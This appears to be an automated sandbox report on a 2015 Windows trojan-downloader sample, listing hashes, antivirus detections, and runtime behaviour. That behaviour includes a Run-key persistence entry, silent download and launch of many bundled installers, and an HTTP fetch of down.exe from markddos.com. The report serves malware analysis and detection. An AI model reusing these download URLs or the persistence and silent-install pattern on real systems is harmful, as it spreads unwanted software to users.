Analysis Date | 2015-04-09 12:30:14 |
---|---|
MD5 | 188a26a038431c5c5d12690e89112639 |
SHA1 | d4c3b0d14be879e6ec89c142d058ca3f84e152e7 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: c1e0625655fec2c794ad156122efaeb6 sha1: 3678539b205969495151a40085f98e5b9ba40dca size: 425984 | |
Section | .rdata md5: 84757542d53dd972b169ed4a1c726f59 sha1: 1b354d4274dfcc9fd968c2eb56f991f68c2efef0 size: 73728 | |
Section | .data md5: 44df68437fe47b536e9db4c156451107 sha1: ec39b3b9f403b81ef643a0147ded306fb9e1ec2e size: 61440 | |
Section | .rsrc md5: b8c2a05a605bdf24eba896ec92c05919 sha1: 54cdb202d623745cac24a169f60bf93a4caf16f1 size: 24576 | |
Timestamp | 2015-04-01 04:05:02 | |
Version | LegalCopyright: 作者版权所有 请尊重并使用正版 FileVersion: 1.0.0.0 Comments: 本程序使用易语言编写(http://www.eyuyan.com) ProductName: 易语言程序 ProductVersion: 1.0.0.0 FileDescription: 易语言程序 | |
Packer | Microsoft Visual C++ v6.0 | |
PEhash | 92364683295be49d51ca27559afa0b36155e08cf | |
IMPhash | 95399cf8f12a4df9c830293f94dcef7f | |
AV | 360 Safe | no_virus |
AV | Ad-Aware | Gen:Variant.Graftor.98607 |
AV | Alwil (avast) | Evo-gen [Susp] |
AV | Arcabit (arcavir) | Gen:Variant.Graftor.98607 |
AV | Authentium | W32/Agent.EW.gen!Eldorado |
AV | Avira (antivir) | TR/Agent.589824.519 |
AV | BullGuard | Gen:Variant.Graftor.98607 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | no_virus |
AV | ClamAV | no_virus |
AV | Dr. Web | Trojan.DownLoader12.54665 |
AV | Emsisoft | Gen:Variant.Graftor.98607 |
AV | Eset (nod32) | no_virus |
AV | Fortinet | W32/Generic!tr |
AV | Frisk (f-prot) | W32/Agent.EW.gen!Eldorado |
AV | F-Secure | Trojan:W32/DelfInject.R |
AV | Grisoft (avg) | Win32/DH{IEEPIiVXZ04} |
AV | Ikarus | no_virus |
AV | K7 | no_virus |
AV | Kaspersky 2015 | Trojan.Win32.Generic |
AV | MalwareBytes | Spyware.OnlineGames |
AV | Mcafee | Pasta |
AV | Microsoft Security Essentials | no_virus |
AV | MicroWorld (escan) | Gen:Variant.Graftor.98607 |
AV | Rising | no_virus |
AV | Sophos | no_virus |
AV | Symantec | no_virus |
AV | Trend Micro | no_virus |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Process
↳ C:\malware.exe
Registry | HKEY_LOCAL_MACHINE\software\microsoft\windows\CurrentVersion\Run\sbds ➝ malware.exe\C:\\x00 |
---|---|
Creates File | C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe |
Creates File | C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Windows\boos.exe |
Creates File | C:\haozip_silent_782130248.exe |
Creates File | C:\pic_silent_782130248.exe |
Creates File | C:\WINDOWS\system32\2345haozip_k87648162.exe |
Creates File | C:\kuwo_silent_782130248.exe |
Creates File | C:\bdpinyin_silent_782130248.exe |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | C:\bdBrowserSetup-5956-ftn_1000151945.exe |
Creates File | C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe |
Creates File | C:\pps_silent_782130248.exe |
Creates File | C:\qqpcmgr_silent_782130248.exe |
Creates File | C:\PPTV_forqd3036_02134.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates File | C:\2345explorer_k87648162.exe |
Creates File | C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe |
Creates File | C:\2345pcsafe_k87648162.exe |
Creates File | C:\dscKAVSETUPS_66_130903.exe |
Creates File | C:\lkfish_k87648162_332947.exe |
Creates File | C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe |
Creates Process | C:\bdpinyin_silent_782130248.exe |
Creates Process | C:\2345pcsafe_k87648162.exe |
Creates Process | C:\pps_silent_782130248.exe |
Creates Process | C:\pic_silent_782130248.exe |
Creates Process | C:\2345haozip_k87648162.exe |
Creates Process | C:\Windows\boos.exe |
Creates Process | C:\kuwo_silent_782130248.exe |
Creates Process | C:\qqpcmgr_silent_782130248.exe |
Creates Process | C:\bdBrowserSetup-5956-ftn_1000151945.exe |
Creates Process | C:\lkfish_k87648162_332947.exe |
Creates Process | C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe |
Creates Process | C:\haozip_silent_782130248.exe |
Creates Process | C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe |
Creates Process | C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe |
Creates Process | C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe |
Creates Process | C:\PPTV_forqd3036_02134.exe |
Creates Process | C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe |
Creates Process | C:\dscKAVSETUPS_66_130903.exe |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Process
↳ C:\2345haozip_k87648162.exe
Process
↳ C:\2345pcsafe_k87648162.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs2.tmp |
Creates File | C:\2345PC~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1.tmp |
Deletes File | C:\WINDOWS\TEMP\scs2.tmp |
Process
↳ C:\lkfish_k87648162_332947.exe
Creates File | C:\LKFISH~1.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
Creates File | C:\WINDOWS\TEMP\scs4.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs3.tmp |
Deletes File | C:\WINDOWS\TEMP\scs4.tmp |
Deletes File | C:\WINDOWS\TEMP\scs3.tmp |
Process
↳ C:\dscKAVSETUPS_66_130903.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs5.tmp |
Creates File | C:\DSCKAV~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs6.tmp |
Deletes File | C:\WINDOWS\TEMP\scs5.tmp |
Deletes File | C:\WINDOWS\TEMP\scs6.tmp |
Process
↳ C:\BaiduAn.Setup.1117.4.0.0.516_1000151945.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs7.tmp |
Creates File | C:\WINDOWS\TEMP\scs8.tmp |
Creates File | C:\BAIDUA~1.EXE |
Deletes File | C:\WINDOWS\TEMP\scs8.tmp |
Deletes File | C:\WINDOWS\TEMP\scs7.tmp |
Process
↳ C:\Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\BAIDUS~1.EXE |
Creates File | C:\WINDOWS\TEMP\scsA.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs9.tmp |
Deletes File | C:\WINDOWS\TEMP\scsA.tmp |
Deletes File | C:\WINDOWS\TEMP\scs9.tmp |
Process
↳ C:\bdBrowserSetup-5956-ftn_1000151945.exe
Creates File | C:\BDBROW~1.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
Creates File | C:\WINDOWS\TEMP\scsC.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scsB.tmp |
Deletes File | C:\WINDOWS\TEMP\scsC.tmp |
Deletes File | C:\WINDOWS\TEMP\scsB.tmp |
Process
↳ C:\BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\BAIDUP~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scsD.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scsE.tmp |
Deletes File | C:\WINDOWS\TEMP\scsD.tmp |
Deletes File | C:\WINDOWS\TEMP\scsE.tmp |
Process
↳ C:\qqpcmgr_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scsF.tmp |
Creates File | C:\QQPCMG~1.EXE |
Creates File | C:\WINDOWS\TEMP\scs10.tmp |
Deletes File | C:\WINDOWS\TEMP\scsF.tmp |
Deletes File | C:\WINDOWS\TEMP\scs10.tmp |
Process
↳ C:\bdpinyin_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\BDPINY~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs12.tmp |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs11.tmp |
Deletes File | C:\WINDOWS\TEMP\scs12.tmp |
Deletes File | C:\WINDOWS\TEMP\scs11.tmp |
Process
↳ C:\pps_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\PPS_SI~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs14.tmp |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs13.tmp |
Deletes File | C:\WINDOWS\TEMP\scs13.tmp |
Deletes File | C:\WINDOWS\TEMP\scs14.tmp |
Process
↳ C:\haozip_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\TEMP\scs16.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\HAOZIP~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\TEMP\scs15.tmp |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Deletes File | C:\WINDOWS\TEMP\scs16.tmp |
Deletes File | C:\WINDOWS\TEMP\scs15.tmp |
Process
↳ C:\pic_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs17.tmp |
Creates File | C:\WINDOWS\TEMP\scs18.tmp |
Creates File | C:\PIC_SI~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Deletes File | C:\WINDOWS\TEMP\scs17.tmp |
Deletes File | C:\WINDOWS\TEMP\scs18.tmp |
Process
↳ C:\kuwo_silent_782130248.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1A.tmp |
Creates File | C:\KUWO_S~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs19.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Deletes File | C:\WINDOWS\TEMP\scs1A.tmp |
Deletes File | C:\WINDOWS\TEMP\scs19.tmp |
Process
↳ C:\PPTV_forqd3036_02134.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs1C.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\PPTV_F~1.EXE |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1B.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1C.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1B.tmp |
Process
↳ C:\bdsBaofeng5%5B%5B1671_02134%5D%5D.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\WINDOWS\TEMP\scs1D.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Creates File | C:\WINDOWS\TEMP\scs1E.tmp |
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\BDSBAO~1.EXE |
Deletes File | C:\WINDOWS\TEMP\scs1D.tmp |
Deletes File | C:\WINDOWS\TEMP\scs1E.tmp |
Process
↳ C:\7654\\xc2\\xbe\\xc2\\xb2\\xc3\\x84\\xc2\\xac\\xc2\\xb0\\xc3\\xbc.exe
Creates File | C:\WINDOWS\SYSTEM32\REDIR.EXE |
---|---|
Creates File | C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE |
Creates File | C:\WINDOWS\TEMP\scs1F.tmp |
Creates File | C:\WINDOWS\SYSTEM32\COMMAND.COM |
Creates File | C:\7654~1.EXE |
Creates File | C:\WINDOWS\TEMP\scs20.tmp |
Creates File | C:\WINDOWS\SYSTEM32\HIMEM.SYS |
Creates File | C:\WINDOWS\SYSTEM32\DOSX.EXE |
Deletes File | C:\WINDOWS\TEMP\scs1F.tmp |
Deletes File | C:\WINDOWS\TEMP\scs20.tmp |
Process
↳ C:\Windows\boos.exe
Network Details:
DNS | download.2345.com Type: A 61.160.245.14 |
---|---|
DNS | download.2345.com Type: A 122.228.248.3 |
DNS | download.2345.com Type: A 218.75.155.244 |
DNS | download.2345.com Type: A 60.191.187.15 |
DNS | download.2345.com Type: A 60.191.223.2 |
DNS | download.2345.com Type: A 60.191.223.4 |
DNS | download.2345.com Type: A 60.191.223.15 |
DNS | download.2345.com Type: A 61.147.127.202 |
DNS | download.2345.com Type: A 61.147.127.203 |
DNS | download.2345.com Type: A 61.160.245.8 |
DNS | download.2345.com Type: A 61.160.245.11 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.11 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.13 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.14 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.9 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.10 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.11 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.234.12 |
DNS | tf01.dlmix.glb0.lxdns.com Type: A 8.37.235.9 |
DNS | brdlsw.jomodns.com Type: A 124.238.238.46 |
DNS | download.58611.net Type: A 218.241.29.215 |
DNS | cache.bfcdn.net Type: A 122.72.76.199 |
DNS | pcsnb2.jomodns.com Type: A 115.231.42.46 |
DNS | www.markddos.com Type: A 198.211.24.230 |
DNS | jifendownload.2345.cn Type: A |
DNS | d.union.ijinshan.com Type: A |
DNS | dlsw.br.baidu.com Type: A |
DNS | u.dl.baofeng.com Type: A |
DNS | nb.cache.baidupcs.com Type: A |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/2345explorer_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/2345pcsafe_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/lkfish_k87648162_332947.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://jifendownload.2345.cn/jifen_2345/2345haozip_k87648162.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://d.union.ijinshan.com/duba/link/dscKAVSETUPS_66_130903.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/BaiduAn.Setup.1117.4.0.0.516_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/Baidusd.Setup.3.0.0.4609.youqian_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/bdBrowserSetup-5956-ftn_1000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://dlsw.br.baidu.com/ditui/zujian/BaiduPinyinSetup_2.13.3.00_sw-0000151945.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/qqPCTray_silent/qqpcmgr_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pinyin/bdpinyin_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pps/pps_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/haozip_silent/haozip_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pic/pic_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/kuwo_silent/kuwo_silent_782130248.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_02134.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://u.dl.baofeng.com/upload/bdsBaofeng5%5B%5B1671_02134%5D%5D.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://nb.cache.baidupcs.com/file/e15788e5a4a5bc4ccbd8acfccccddd3b?bkt=p2-qd-294&xcode=57d758161f66de706ccd294c1df1f083ad23dfac9bf6b2990b2977702d3e6764&fid=1801360174-250528-100554078920541&time=1427860893&sign=FDTAXERLBH-DCb740ccc5511e5e8fedcff06b081203-FFbapq2m6pKvQgf68PPDkIbWRiQ%3D&to=nbc&fm=Nan,B,M,ny&sta_dx=2&sta_cs=1&sta_ft=exe&sta_ct=0&newver=1&newfm=1&flow_ver=3&sl=80347212&expires=8h&rt=sh&r=417997622&mlogid=3844192640&vuk=137491712&vbdid=3540108374&fin=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe&fn=7654%E9%9D%99%E9%BB%98%E5%8C%85.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
HTTP GET | http://www.markddos.com:8555/down.exe User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) |
Flows TCP | 192.168.1.1:1031 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1032 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1033 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1034 ➝ 61.160.245.14:80 |
Flows TCP | 192.168.1.1:1035 ➝ 8.37.235.11:80 |
Flows TCP | 192.168.1.1:1036 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1037 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1038 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1039 ➝ 124.238.238.46:80 |
Flows TCP | 192.168.1.1:1040 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1041 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1042 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1043 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1044 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1045 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1046 ➝ 218.241.29.215:8181 |
Flows TCP | 192.168.1.1:1047 ➝ 122.72.76.199:80 |
Flows TCP | 192.168.1.1:1048 ➝ 115.231.42.46:80 |
Flows TCP | 192.168.1.1:1049 ➝ 198.211.24.230:8555 |
Raw Pcap
0x00000000 (00000) 47455420 2f646f77 6e2e6578 65204854 GET /down.exe HT 0x00000010 (00016) 54502f31 2e310d0a 55736572 2d416765 TP/1.1..User-Age 0x00000020 (00032) 6e743a20 4d6f7a69 6c6c612f 342e3020 nt: Mozilla/4.0 0x00000030 (00048) 28636f6d 70617469 626c653b 204d5349 (compatible; MSI 0x00000040 (00064) 4520362e 303b2057 696e646f 7773204e E 6.0; Windows N 0x00000050 (00080) 5420352e 30290d0a 41636365 70743a20 T 5.0)..Accept: 0x00000060 (00096) 2a2f2a0d 0a486f73 743a2077 77772e6d */*..Host: www.m 0x00000070 (00112) 61726b64 646f732e 636f6d3a 38353535 arkddos.com:8555 0x00000080 (00128) 0d0a4361 6368652d 436f6e74 726f6c3a ..Cache-Control: 0x00000090 (00144) 206e6f2d 63616368 650d0a0d 0a373839 no-cache....789 0x000000a0 (00160) 32303534 31267469 6d653d31 34323738 20541&time=14278 0x000000b0 (00176) 36303839 33267369 676e3d46 44544158 60893&sign=FDTAX 0x000000c0 (00192) 45524c42 482d4443 62373430 63636335 ERLBH-DCb740ccc5 0x000000d0 (00208) 35313165 35653866 65646366 66303662 511e5e8fedcff06b 0x000000e0 (00224) 30383132 30332d46 46626170 71326d36 081203-FFbapq2m6 0x000000f0 (00240) 704b7651 67663638 5050446b 49625752 pKvQgf68PPDkIbWR 0x00000100 (00256) 69512533 4426746f 3d6e6263 26666d3d iQ%3D&to=nbc&fm= 0x00000110 (00272) 4e616e2c 422c4d2c 6e792673 74615f64 Nan,B,M,ny&sta_d 0x00000120 (00288) 783d3226 7374615f 63733d31 26737461 x=2&sta_cs=1&sta 0x00000130 (00304) 5f66743d 65786526 7374615f 63743d30 _ft=exe&sta_ct=0 0x00000140 (00320) 266e6577 7665723d 31266e65 77666d3d &newver=1&newfm= 0x00000150 (00336) 3126666c 6f775f76 65723d33 26736c3d 1&flow_ver=3&sl= 0x00000160 (00352) 38303334 37323132 26657870 69726573 80347212&expires 0x00000170 (00368) 3d386826 72743d73 6826723d 34313739 =8h&rt=sh&r=4179 0x00000180 (00384) 39373632 32266d6c 6f676964 3d333834 97622&mlogid=384 0x00000190 (00400) 34313932 36343026 76756b3d 31333734 4192640&vuk=1374 0x000001a0 (00416) 39313731 32267662 6469643d 33353430 91712&vbdid=3540 0x000001b0 (00432) 31303833 37342666 696e3d37 36353425 
108374&fin=7654% 0x000001c0 (00448) 45392539 44253939 25453925 42422539 E9%9D%99%E9%BB%9 0x000001d0 (00464) 38254535 25384325 38352e65 78652666 8%E5%8C%85.exe&f 0x000001e0 (00480) 6e3d3736 35342545 39253944 25393925 n=7654%E9%9D%99% 0x000001f0 (00496) 45392542 42253938 25453525 38432538 E9%BB%98%E5%8C%8 0x00000200 (00512) 352e6578 65204854 54502f31 2e310d0a 5.exe HTTP/1.1.. 0x00000210 (00528) 55736572 2d416765 6e743a20 4d6f7a69 User-Agent: Mozi 0x00000220 (00544) 6c6c612f 342e3020 28636f6d 70617469 lla/4.0 (compati 0x00000230 (00560) 626c653b 204d5349 4520362e 303b2057 ble; MSIE 6.0; W 0x00000240 (00576) 696e646f 7773204e 5420352e 30290d0a indows NT 5.0).. 0x00000250 (00592) 41636365 70743a20 2a2f2a0d 0a486f73 Accept: */*..Hos 0x00000260 (00608) 743a206e 622e6361 6368652e 62616964 t: nb.cache.baid 0x00000270 (00624) 75706373 2e636f6d 0d0a4361 6368652d upcs.com..Cache- 0x00000280 (00640) 436f6e74 726f6c3a 206e6f2d 63616368 Control: no-cach 0x00000290 (00656) 650d0a0d 0a e....
Strings